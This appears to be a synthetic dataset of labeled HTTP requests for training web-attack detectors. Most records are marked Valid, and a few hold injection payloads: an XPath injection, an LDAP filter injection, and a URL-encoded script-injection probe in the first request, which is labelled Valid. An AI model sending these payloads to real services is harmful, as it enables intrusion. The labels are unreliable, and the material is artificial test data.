GET /wJXviK/dTxhwB1TC.dll?BPZR7=%3Cbody++onload+++%3D++%22%5Balert++%28%27deesdg1a%27%29%3B%5D++%22++%3E&arr7hvec=009982&3EconnectcFY3vmocha=127188&ieansNmat0bi=lseiso7p7t9neeop&ex5Poelwdmd4q=4113396&8fvptyansi=ar&ike=Aar%5C&homekV71=58&oEzxthas53=7&qhprgni3=%3E&td1iyMit=%4012cniEt%2Bht%26o%28e%3Aq+tE HTTP/1.1
Host: www.3euaOemh4r.org
Connection: close
Accept: audio/basic, text/xml, audio/*;q=0.3
Accept-Charset: windows-1252, euc-cn, euc-jp;q=0.1, iso-8859-2;q=0.8, macintosh;q=0.9
Accept-Encoding: gzip, identity, deflate;q=0.8, identity, deflate;q=0.3
Accept-Language: pngp-sib3ec;q=0.1, rwmfaos-illhaw, trcm-s;q=0.8, sic-w;q=0.7, gthtm8si-djaepevA;q=0.6
Cache-Control: only-if-cached
Client-ip: 120.244.182.14
Cookie: r1vb=dMx@0jzgk;7dn09en=zi2fo;ieYisek4=433676;ssyEntzp4r=qpMtfgUvhxz;n9eT0e=prHLat5wtrhUDg;etii=cmT5aii4jeg0o
Cookie2: $Version="8"
Date: Mon, 03 Mar 08 24:56:20 CET
ETag: "5Prg8S_P@.fZQyoZ"
Expect: aZpnthrk
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Wed, 21 May 08 10:09:46 GMT
If-Unmodified-Since: Mon, 04 Feb 08 07:48:06 CET
If-Match: "eoyKEnb8nGT-xB-qzP"
If-None-Match: "qTkrEdgRX.XPC@P"
If-Range: Thu, 04 Oct 07 01:24:23 CET
Max-Forwards: 159
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM Nm5laWV0MGl2TnRzb0VhMnJrbG1pbmQ2ZWFkemN0Zzk1ckZCaGU=
Authorization: Basic Y21lbjpvbW9hc2U=
Range: 2718-09734,749039-
Referer: http://www.tbauaie.de/isyhh3e/le6ifel/6etyt.jsp
TE: deflate,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.5 (compatible; yeonizo7r; SunOS sun4u; KttRt; nn9eaoxhbd; gooeEmL9)
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2187x3503
Via: HTTP/3.0 245.57.233.254:3034, fsm4/8.0 www.oclhx.tiff
Transfer-Encoding: letot; tfei9=lpsya
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 112.140.177.233
X-Serial-Number: 57604389
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47551
Start - Id: 32993
class: Valid
PUT /iBy.IVmbd@g4O401/yTzOCCQX750-P/xorobjectDBlsAgmwhereh/bvdq11KuRzp8aipKFEe/gR0MA/blite.php3? HTTP/1.0
Content-Length: 173
Content-Language: taiecse,ebdermqt,Nabd5
Content-Encoding: deflate
Content-Location: /rsacqroa/atet/lrsamg/podoaiyi/poqbaax.msf
Content-MD5: aGFub2hyYnNvZnRldnRtdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Jun 08 15:23:07 UTC
Last-Modified: Tue, 04 Jul 06 16:21:08 CET
Host: 167.95.228.77
Connection: keep-alive
Accept: video/quicktime, text/*;q=0.0, text/xml
Accept-Charset: euc-cn;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 88.92.175.156
Cookie: @fNS9xpsvkdH=7294
Cookie2: $Version="2"
Date: Mon, 19 Dec 05 22:08:15 GMT
ETag: W/"egmE-IkQkEl.JHK8ZQq"
Expect: sefcasnt=neyqhal
From: nxhoo@luihsl.gov
If-Modified-Since: Mon, 09 May 05 01:58:21 UTC
If-Unmodified-Since: Wed, 19 Aug 09 06:37:33 CET
If-Match: "i7LM1NzCoU7sB00g5CDL"
If-None-Match: "H27fPTPBjwDes882n6"
If-Range: *
Max-Forwards: 7
MIME-Version: 1.9
Pragma: nrOe=usiie
Proxy-Authorization: hhFHT hdinre=f4edi9s
Authorization: Digest response="76535388aEaeFd62AE674aA6ECBAf689"
Range: 030-05545,617-,-53
Referer: http://www.ao6e2enr.fr/hroesplu/rptnn/srz5ats/s1mi1sf/cM3qj.php4
TE: trailers,chunked;q=0.3,trailers
Trailer: Accept-Charset
User-Agent: 20ttkaeeei (88sSzgoRbC; tm3ShFxXiF; mssKPp)
UA-CPU: MIPS
UA-Disp: 0209,118,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 560x481
Via: HTTP/4.6 57.145.196.112, ooeoal/5.3 www.thiae.png, FTP/8.6 26.161.33.45
Transfer-Encoding: compress
Upgrade: seoh/4.5, k3f0q/5.1
Warning: 960 www.dvr2eom.js:20 "esme5cmn4diad" 
X-Forwarded-For: 225.92.175.53
X-Serial-Number: 75673085046625
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

vleEadpd=133179&yjeeKicrOuhnOz=14955&aeka5ekhb=aDjtpnRE&TOygr2h=;owautoexec&aBhttMaosptttss=94697&qfromdav=tatDecbgsoundpt&vxat=oQ&eljnbxamme=b0$&a3typrseAa= &e6UiitEr=1

End - Id: 32993
Start - Id: 11864
class: Valid
GET /qOrRQJ0ip2iDA/scriptHinYm.png? HTTP/1.0
Host: 21.93.52.239
Connection: 7lng7moc
Accept: text/html;q=0.8, video/*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=191
Client-ip: 253.123.138.51
Cookie: d49p0oegfbs4ns8=-;ira6Ai2lis=twOTcwc
Cookie2: $Version="707"
Date: Thu, 28 Dec 06 08:41:20 CET
ETag: W/"63D0fXxNEmQl@u3M_yXu"
Expect: eo6ITna=f0lro7h;mqmonjt
From: letI@hnH5isut.cz
If-Modified-Since: Wed, 22 Sep 04 05:58:23 GMT
If-Unmodified-Since: Tue, 09 Oct 07 11:33:53 CET
If-Match: *
If-None-Match: "dACY@Jn1l4UmY-c8"
If-Range: "YBh-cxJ35xk4M9vX3ook"
Max-Forwards: 4
MIME-Version: 7.4
Pragma: eso9=c4i
Proxy-Authorization: hnLol ueohtIwr=wHldEo
Authorization: Basic TnJhYjpyZWltc3ZsTA==
Range: -5,8-9019,5352-463
Referer: http://www.iilt.st/piEtOrt/Shhiia/ltnt/wsmnyo.sh
TE: chunked;q=0.7,gzip;q=0.4
Trailer: User-Agent
User-Agent: gehm4t0n3/8.7
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 872x2543
Via: 6.7 240.118.241.121, HTTP/1.5 223.98.8.34, 4.9 www.yie3.jpg:8331
Transfer-Encoding: compress
Upgrade: lltieH/6.5, 2et/0.0, iyc5/0.7, 8ffaA/4.1, ur2r/2.3
Warning: 165 174.179.176.135:93465 "taieryl3onnp5cttaanx" "Wed, 31 Dec 08 04:33:55 CET"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 02595980702101510
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11864
Start - Id: 20173
class: Valid
GET /PGX_-enrL0WRm2p/tRacyoaadhpna2suF6/..mNN/n8MQ4xbZenuPuw8GNAO/isQoUYBfwC958k.ATL/UWJRWEncvgcopy.bin?77Ony2jRi6sonoi=7942732&istrtocnccpteov=dsdsh HTTP/1.1
Host: www.s6js.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=164
Client-ip: 214.165.147.24
Cookie: euinses=4888509
Cookie2: $Version="340"
Date: Mon, 26 May 08 01:54:05 GMT
ETag: W/"@HVg4-knDb_J41r96"
Expect: rawnlm=hehotset
From: eosoO@enstol2ni.de
If-Modified-Since: Mon, 10 Apr 06 06:54:20 UTC
If-Unmodified-Since: Mon, 20 Dec 04 18:37:49 CET
If-Match: *
If-None-Match: "_k.@0osY@IAoIrVn"
If-Range: Wed, 05 Dec 07 05:21:37 CET
Max-Forwards: 862
MIME-Version: 4.6
Pragma: ecMactc='d1v2mzrA'
Proxy-Authorization: Digest nonce
Authorization: Digest username="eliuoo"
Range: 365749-,607-065
Referer: http://a7iax4ei.it/tv3Oem/hsoetbl.jpg
TE: trailers
Trailer: TE
User-Agent: 536cioQ (vVO7xTcS_o; i_DW-Xe; bSfTVC; evz9T-Mh; 1LH1@wm)
UA-CPU: PowerPC
UA-Disp: 909,081,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 297x878
Via: FTP/0.0 26.234.112.57, gNaroE/5.4 www.6un6bt.css:5, HTTP/3.0 www.pjog.htm
Transfer-Encoding: gzip
Upgrade: oieit/1.6, oam/2.4, hter/6.0, edl/2.6, anna/8.1
Warning: 651 88.213.252.125:060 "5sir4foalundnc" "Thu, 24 Mar 05 09:39:40 CET"
X-Forwarded-For: 108.223.104.239
X-Serial-Number: 818940289037897740
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20173
Start - Id: 10008
class: Valid
GET /3ltfnaeehjtkave.asp? HTTP/1.0
Host: 34.66.238.140:80
Connection: close
Accept: image/png, audio/x-wav;q=0.7, application/postscript
Accept-Charset: isiri-3342;q=0.9, euc-jp, big5, x-mac-japanese, iso-8859-4;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 177.123.168.57
Cookie: snmSnAo=linkee;uinput7WnullGv1y=2208637;bai70ondlt=988;raul=610602582
Cookie2: $Version="2"
Date: Tue, 25 Sep 07 22:35:26 UTC
ETag: "37Du@YuAnBeW63f@"
Expect: sE9tIn
From: 2rbOee@urmb.de
If-Modified-Since: Fri, 09 Jul 04 19:34:54 UTC
If-Unmodified-Since: Mon, 05 Jun 06 07:09:58 UTC
If-Match: "_atucQgMH@H0dlST"
If-None-Match: "o89E.UpE4JgTtkUVyM"
If-Range: *
Max-Forwards: 678
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: tshs Axeteu=gear
Authorization: egso8t isrwWc1i=aionck
Range: 7-,1-2,575-73
Referer: /cfNmtt.swf
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/5.8 (Machintosh; U; Mac OS X 0.4; ho-t0; rv:4.2.6) Gecko/02614829
UA-CPU: x86
UA-Disp: 0205,052,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 765x642
Via: 6.1 170.93.70.244, HTTP/6.8 www.kttt.jpeg:82896
Transfer-Encoding: gzip
Upgrade: 2nos5s/7.0
Warning: 441 www.sNfaestc.html:841 "a3fh" 
X-Forwarded-For: 48.85.205.201
X-Serial-Number: 54263
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10008
Start - Id: 22267
class: Valid
GET /itcm/yceaqopphay4jup9psU/n@.qmjH1Ylpkz2GPZ.nsf?teh5o5lehoendi=gliK874C-.b&fhDEhneucl=Nad%3E HTTP/1.0
Host: 207.4.239.39
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=93
Client-ip: 215.189.117.126
Cookie: rI5aiuwtnA1tdtr=semod;cw=658898382;npelbleeo=12;ynrcus=4;wh5eed=Tud;3vjaGcYp6L=39161
Cookie2: $Version="6"
Date: Tue, 28 Mar 06 08:43:30 UTC
ETag: W/"Mt70A0ufCQABEQggG16"
Expect: oz0Ted=ierRlone
From: orEtts@ismhaeter.de
If-Modified-Since: Sat, 05 Dec 09 04:36:46 GMT
If-Unmodified-Since: Fri, 13 May 05 09:43:33 UTC
If-Match: *
If-None-Match: "wEZdj8rB7OKRI.hxs4s"
If-Range: Tue, 30 Jun 09 17:43:47 CET
Max-Forwards: 75
MIME-Version: 9.7
Pragma: bda=ue
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest uri=http://Fgi8he.org/solt1orn/naghniat/r1tfe/sEaetih.jpeg
Range: 187831-,-728581,-573791
Referer: http://www.UFnCic.biz/ttSb.jpg
TE: trailers
Trailer: From
User-Agent: dsia (eqd-k-Mh; twq5nSOo; tKYJ22ljQr; eXd786mqII)
UA-CPU: MIPS
UA-Disp: 0876,9361,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8023x069
Via: FTP/6.1 www.nu4eusae.gif, 8.5 192.102.42.50, FTP/6.0 www.tulhn.html:861
Transfer-Encoding: rt4O; teitRog=stgeafha
Upgrade: irahX/5.4, ar3e/6.1, neltc/9.8
Warning: 967 240.225.47.66:3503 "oene7icne5sdt6" 
X-Forwarded-For: 87.182.52.50
X-Serial-Number: 35178476793
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22267
Start - Id: 12711
class: Valid
GET /rdy2OuMH8XeWKzypA/mSJkL0igfAof/9chO8tehntyer3r/_hYimgIMA3Yrmg5b/Uin9cZ7I/rpxdEthtsreaiTiinpde/wyzooe2ygadnlwhttk/7nwdReycNbeojf/0cN9/x6YDdG.shtml?un9Lanj=rttbtyohie&servicespV2hZ=egguSts&ciihixrsa=29580&csmrLanlrt=r%29Ohi%5B8o&utata=pTsgJY4oav&_80m0=uinputrebtiogemrf&eioecl1wo7=oHApC-xic&hennheidn=e6rdn8sbandPoilrn7tlog%3C%26&cQr1=dDbsgTf2ahD&IuetaWs=rpexec%29d&o2kFnwsN6l=%2ByWd1h7openhO94document3&jvwV0V@=formT&tzetEeO65e8hh=n_-X&Sy.V3j.-=16&5ouDv94Nsiiuf=e+betweeno HTTP/1.0
Host: www.dkN2.com
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: cp-932, cp-932;q=0.8, koi8-r;q=0.3, iso-8859-8-i
Accept-Encoding: identity;q=0.3, deflate
Accept-Language: uynAhO0-w;q=0.2, 079lwahr-t4ue4te;q=0.2
Cache-Control: min-fresh=20
Client-ip: 216.193.63.216
Cookie: oeixeeonoraat4=wTCAKeyH4VT;p5ch=ypanuuniui6eeu;teteeTcSgosin7h=cA;in;lgg22uwrbeO=2260448806;tMSBvSw_.C0=pjttit;feSercnlamwta=andnecjT2h
Cookie2: $Version="20"
Date: Tue, 12 Dec 06 24:42:51 CET
ETag: "F-P9rPW.05DuWJyT3byI"
Expect: 100-continue
From: aIsia@oetle.org
If-Modified-Since: Mon, 23 Feb 04 18:16:28 UTC
If-Unmodified-Since: Thu, 25 Nov 04 11:33:24 CET
If-Match: "UXblkL0q4NWqmwcUJB8s"
If-None-Match: "q8N2WMycgaN5EqJq3v"
If-Range: Mon, 18 Dec 06 03:42:35 GMT
Max-Forwards: 381
MIME-Version: 1.7
Pragma: yeSyTo=0
Proxy-Authorization: NTLM Z2huZTZwcmlldG84d2Vpc2VhZDNpZ25lZmhmZWVlbHRlZGxhOGFn
Authorization: NTLM YWNsN2Vpb0k5czRMaWUzMWNMb2VidWplQW5hZWFlaHRmN0FoZWk0c3R0ZEc5Zg==
Range: 9092-,513-7
Referer: /oesiz/ylNRash.mdb
TE: trailers,gzip,chunked;q=0.2
Trailer: Accept-Charset
User-Agent: s7Cf8YjHe http://www.SnsEshd.gov
UA-CPU: Sparc
UA-Disp: 753,2579,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9736x3360
Via: FTP/5.3 72.64.133.32
Transfer-Encoding: refi4; iodctlf=Lsktqtr
Upgrade: aao1rt/4.8, oho4/0.3, ln3tas/2.5
Warning: 566 www.iaages.png "ihfood" "Thu, 27 Jan 05 04:38:01 CET"
X-Forwarded-For: 227.241.172.23
X-Serial-Number: 91220427481224
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12711
Start - Id: 806
class: Valid
GET /o5t/ici/gG1d/52gdu2e.css? HTTP/1.0
Host: 202.49.121.10
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.4
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 105.102.14.216
Cookie: nrnMsi=rL 91;;wg=AxnfytEliriri;5zae=93312;rudhwt=5987815
Cookie2: $Version="5"
Date: Sat, 12 Nov 05 20:51:16 GMT
ETag: W/"vmSA-6D5iyFnqPDf"
Expect: 100-continue
From: nfa6t@yuhu.net
If-Modified-Since: Mon, 30 Jul 07 19:12:16 GMT
If-Unmodified-Since: Wed, 22 Apr 09 13:48:21 CET
If-Match: "Fmzyyq8KZklVJ3KS"
If-None-Match: "SHPLFNKU.H@ZJdekU"
If-Range: *
Max-Forwards: 8624
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic Y3VlZGFlOm5aaXlG
Authorization: Digest response="D1dfcbd2CC8A2F166cfaEe68dB04e49A"
Range: 15-20,08858-
Referer: /diul/oaerhog/mnhemda.css
TE: chunked;q=0.8,chunked,deflate
Trailer: If-Unmodified-Since
User-Agent: tumtgcxwhyEe
UA-CPU: MIPS
UA-Disp: 764,3407,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7750x8072
Via: 3.7 www.tlmGmo.html:37394, 4wVlp/8.4 169.74.50.34
Transfer-Encoding: sssys; eaiet=Opi9tael
Upgrade: 3iofx/3.1, Trldr8/3.5
Warning: 902 87.88.171.144 "hqqbnejgret8be" 
X-Forwarded-For: 183.29.19.247
X-Serial-Number: 40823
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 806
Start - Id: 49943
class: XPathInjection
GET /zsnsntDeeotiacs/oORkte46Kh3zlBY.6/rWmxf98ZvmheX24Fh/cmnnhrJ/ofatamrJomonwgfo/nlat7tewtmbeete/sJ7ckY/qgw/1RDXvfEVgUdRPY/sock_streamhk7Q1Qz.js?iqoo=eti%27+or+++oaqd%2Fay%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D4%5D+++or++++%27dcly34t%27++%3D+++%27&chece1emw=idaiGsnfTeitnri&Gso1=N%2Beboot.inixdec&eele=O4Aey6An&eaal8=0587631&orsaajreEtksnyd=960666419&rxuehlp=65268&ra0Ruoteotia4so=+autoexecopositionr&u@JSmochaF=htaccesidf&s3usosywto=%7C+og HTTP/1.1
Host: www.hansa.it
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, compress, compress, gzip
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 69.149.110.120
Cookie: hogd=Rsssehmrr7reuonb;Eiooasy8aOM=h8lcozton5Noaaemp
Cookie2: $Version="8"
Date: Mon, 10 Oct 05 19:43:36 GMT
ETag: W/"i-WIg.Pxydq@40bwD"
Expect: 100-continue
From: gxo4Nam@arrt3.it
If-Modified-Since: Thu, 28 Apr 05 17:16:19 GMT
If-Unmodified-Since: Tue, 25 Nov 08 20:48:27 CET
If-Match: *
If-None-Match: "1K.6ZCeUdVPHiqE"
If-Range: "wk.hGUFLHYe5QKrP9"
Max-Forwards: 563
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: ettae m6re9i=swtosa
Range: 33-0
Referer: http://www.gAfian.gov/cm22.js
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Hoes/1.1
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Linux
UA-Pixels: 299x2707
Via: HTTP/7.6 144.188.45.39, 1.6 www.He9m6.html, 0.7 167.55.66.57:75
Transfer-Encoding: identity
Upgrade: oepjtw/9.0, eribt/2.4, enN/6.1
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49943
Start - Id: 32955
class: Valid
POST /kuATgIcBcS3uzaTi3.png? HTTP/1.0
Content-Length: 66
Content-Language: L,o
Content-Encoding: identity
Content-Location: /xattmXDd/qutecrt/qRhNtT.doc
Content-MD5: MGRvaDduUmhhaXJzdHNpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Apr 05 05:00:37 CET
Last-Modified: Mon, 12 Dec 05 13:10:26 CET
Host: www.2ssa.it
Connection: tnmi
Accept: audio/x-wav, image/png;q=0.7, video/mpeg;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.5, compress;q=0.5, compress;q=0.5, identity
Accept-Language: esled-t, 1nhytee-a4hatumo;q=0.6, s9-tsba3e, Eeha-TreEn;q=0.9
Cache-Control: no-cache
Client-ip: 87.43.35.131
Cookie: 8Ca1ak=llby0DU;Sn7m=nlnE cOnph-ehLtrym|7es;ATd=gaoy?7uhAAd;HRemGstyleBAy@=19486524
Cookie2: $Version="23"
Date: Fri, 05 Nov 04 06:43:54 UTC
ETag: "VaitjbTg0I9gGkX3h"
Expect: 100-continue
From: T2hnaaf@eteaviqo.cz
If-Modified-Since: Sat, 18 Mar 06 07:34:01 CET
If-Unmodified-Since: Tue, 22 Jun 04 23:39:55 CET
If-Match: *
If-None-Match: "_DD3QYhD@3jPH8PNfY7"
If-Range: ".pL@Qo3B.4C@MbaQJ"
Max-Forwards: 979
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic aXNTNzlyOnR0eHVl
Authorization: qWue ieeh=s0dEs
Range: -640988,8264-06,-377046
Referer: http://ed1if.org/os3w0S6t/odnn/aoro/gibhb/Ncin.mspx
TE: deflate;q=0.4,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.9 (X11; U; Linux i586 7.2; tt-rt; rv:2.7.4) Gecko/89072614
UA-CPU: StrongARM
UA-Disp: 8787,462,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 532x605
Via: 4.7 www.uhWgo.png, FTP/7.3 www.sjmso7t.htm
Transfer-Encoding: gzip
Upgrade: bja5e/7.6
Warning: 432 175.168.172.127 "tr8n3rmtlSfh" 
X-Forwarded-For: 55.183.39.168
X-Serial-Number: 8256064879987524435
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wre2hasuiaQ=Hegh&tff4PSR-p=]&t8oa0rvbscriptsegnat&lns=txraVoil

End - Id: 32955
Start - Id: 37624
class: LdapInjection
POST /style2badminQnc4sG/lIiyledvrc3/rEgvs3SplX.jpeg? HTTP/1.1
Content-Length: 316
Content-Language: zt,tn,cfmrr
Content-Encoding: identity
Content-Location: /TxjhxnA/wmwusie/UtR5Wnu/tknee.conf
Content-MD5: YTl1aDJqNGhjb2l1dm1ocA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 28 Mar 08 02:02:00 CET
Last-Modified: Wed, 15 Dec 04 22:41:38 UTC
Host: www.qbhoiiea.fr
Connection: close
Accept: text/*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, deflate;q=0.0
Accept-Language: eyyag-ouyT, 9-stest2d, i89-aEi, mh28y-hi7i
Cache-Control: no-cache
Client-ip: 236.109.120.226
Cookie: im0d8isphn=602658394;7i7tLihfkbci=gq0rier;eeisrAOi77z3a=eti;5fqk9egloukhnmb=e9evoo2&h;etRaela9t2phmt=45
Cookie2: $Version="0"
Date: Wed, 26 Dec 07 11:46:11 UTC
ETag: W/"DddEOWrjiiTyulSVN@"
Expect: 100-continue
From: Isa0nt0@Tiskeey.com
If-Modified-Since: Tue, 03 Jun 08 11:09:45 UTC
If-Unmodified-Since: Fri, 20 Feb 04 23:14:20 GMT
If-Match: *
If-None-Match: "5FSjhDuT7b2BQUdJ"
If-Range: Sat, 22 May 04 11:16:44 GMT
Max-Forwards: 048
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest username="pitaah"
Authorization: Basic QWFvZzptUmFwZGk=
Range: -6153,297-,439-473
Referer: http://6wyHlma.cz/fsndo/1NqnlEc/AaeEj/en3eo.msf
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: de88aeAonifI
UA-CPU: MIPS
UA-Disp: 2548,1743,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: tl3too/3.6 106.230.232.152:85087, 2.3 www.2cieDnuE.htm, or54/8.0 www.AR6wvni.js
Transfer-Encoding: deflate
Upgrade: h2wcb/8.8, cimsk/8.6, t7ta/0.2, stciO/0.4
Warning: 904 www.kohoocU.html "niuhm" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

n2B=61371776&ym=oceidoe8tAtos&yqccl=)(|(displayName=had*) (name  =  had*   )(mail=had*   )&diounae=38&aoifh=o7uUh&mwtie=a3_No&pnph-jftpVay=47&kinputZ.CmH75ihtacces.=615082&atntpuEhOgdt=tctdtvo0rfee&qnlrnnasYoeoeO=htog0wNi&evha6o=oe0@kCv8a&in77byviyrerse= 1includectrby9>|ii4vtmpcand\t

End - Id: 37624
Start - Id: 13978
class: Valid
GET /nV/mcISssVf.k9XoNc/gXEHosYJp6/iN@n0aLD.png?OeOii=taNinepk&2aiRieoc=ouyi%3F1execxy%2Fr3k&eleny=4lhiehyant3Ro&peoov7k7nia=u&sXlaTdHsjHj=e_8%40AT28d&OvCCf-ChGa=96809&eiauhIyycv=it&utOvgeuhIissp=acliblocation&begsscriptXoz=o&udtMjiaeog5=wym&ra027tooiLt2e1=661691933&DjwheresUf@xcmdO=kbha-&ethd0r9o=017105933 HTTP/1.0
Host: 98.174.188.101
Connection: en7y
Accept: image/jpeg, image/jpeg;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 24.226.3.114
Cookie: ttk=:x
Cookie2: $Version="37"
Date: Thu, 21 Apr 05 08:06:59 UTC
ETag: W/"8JXFlRSCoI-nI9R6pUv"
Expect: 2uae4Rs
From: sTsgewns@snfh4s.it
If-Modified-Since: Fri, 20 May 05 08:29:51 GMT
If-Unmodified-Since: Mon, 23 Feb 09 19:27:10 UTC
If-Match: *
If-None-Match: "74sd4VC5IMRbtkcgV"
If-Range: ".IPKjer5XO2NbZz"
Max-Forwards: 942
MIME-Version: 9.0
Pragma: axs=dmnAbh
Proxy-Authorization: NTLM dGliYmVwYU1oZXN6NXJlbkRvb2ZlYTh0aW5PcjFSZW9lbmJsZQ==
Authorization: taee hostDm=Hrup
Range: -895005
Referer: /Tgianoe1.png
TE: deflate;q=0.4,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.0 (Machintosh; U; PPC 7.8; Ze-tI; rv:6.1.9) Gecko/97497447
UA-CPU: MIPS
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7780x7588
Via: 3.5 109.39.231.61
Transfer-Encoding: compress
Upgrade: tiowa/3.9, SsnfV/0.1
Warning: 014 www.tnuIs7i.tiff "5sfpswi" 
X-Forwarded-For: 90.110.72.221
X-Serial-Number: 738264285065396
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13978
Start - Id: 18658
class: Valid
GET /tosefEohiububdmuin/apalr/n.Ilog/2javltTmnoce/dKev/43GhJxXZUsdocumentD.cfm?l8tieekxc=hggreytl&ea=iwn&aldbbt=5mni4j&hpjniUra=oow%26systemnperldocumentuou&@GSvNSN=o9&oa5etqan=egvRT&mnqescr8ee=Hn4sejrnnhratEy&grcWB5object=onmws0&or=rPth&bii=teota3rnuaqsiio&0ohIeoiaCieiB=zlAd&ARAn=633&aeeendrs=+xp_tSaon&t0iet15inrenweu=zE+aee+ HTTP/1.0
Host: 33.232.148.76:80
Connection: tjne
Accept: audio/basic, application/zip;q=0.6
Accept-Charset: x-mac-cyrillic, windows-1253;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 4.43.184.37
Cookie: yssmmwesedeG=iss$pb;xUipta=saqoo6aPNhRd;PhO8FitIr=|h4r-h;ma4rd5rR=n's]n;muhd=snPh8gS0HW;DvQFupdate2passwdcopyv.s=71776097
Cookie2: $Version="42"
Date: Wed, 16 Jul 08 06:53:12 CET
ETag: "QkhFCH2dPB03KxuMj"
Expect: Naud=docmmtt;rdrdTo
From: sue8eo@qtEnDQ2.de
If-Modified-Since: Tue, 10 Mar 09 09:39:00 GMT
If-Unmodified-Since: Sun, 11 Dec 05 15:39:04 CET
If-Match: *
If-None-Match: "rlveoYIIxvaVm6q"
If-Range: Sat, 14 Apr 07 18:46:11 GMT
Max-Forwards: 453
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="msdld"
Authorization: znebo ctaroeot=emeodees
Range: -0
Referer: /nmn2eggw/PEao/eesn.aspx
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: i3Al2sT
UA-CPU: StrongARM
UA-Disp: 7139,4412,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 542x850
Via: FTP/0.3 www.njeret.shtml, 9.1 www.todeOui.png, xt1/8.0 www.esrotgqn.jpeg:4700
Transfer-Encoding: gzip
Upgrade: eaBz/5.2, etexlo/6.3, eoD/7.3
Warning: 599 248.78.6.97 "deo0tiacbum" 
X-Forwarded-For: 157.146.253.229
X-Serial-Number: 6772472077190177266
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

